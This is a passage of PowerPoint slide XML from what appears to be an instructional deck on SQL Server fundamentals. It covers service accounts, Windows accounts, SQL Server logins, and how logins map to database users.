                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Every</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> instance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>installed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>, a set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>actually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>being</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>installed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>uniquely</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>named</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="1219170"/>
            <a:endParaRPr lang="cs-CZ" sz="1867" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
              <a:latin typeface="Signika Negative" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>At a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>high</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>types</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>exist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" algn="just" defTabSz="1219170">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" algn="just" defTabSz="1219170">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Logins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>inside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> SQL Server) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" algn="just" defTabSz="1219170">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>inside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> SQL Server)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" algn="just" defTabSz="1219170">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" sz="1867" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
              <a:latin typeface="Signika Negative" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> and SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>logins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>signing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> SQL Server. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
              <a:latin typeface="Signika Negative" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="111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D7FA-1AC4-E346-8EB5-91D18B4A51F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>Fundamentals </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Contd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8740A91-1A2E-0048-83D1-A5B6105C4491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> has to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mapped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to a database user (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> are a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SysAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>). A database user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>created</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>separately</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
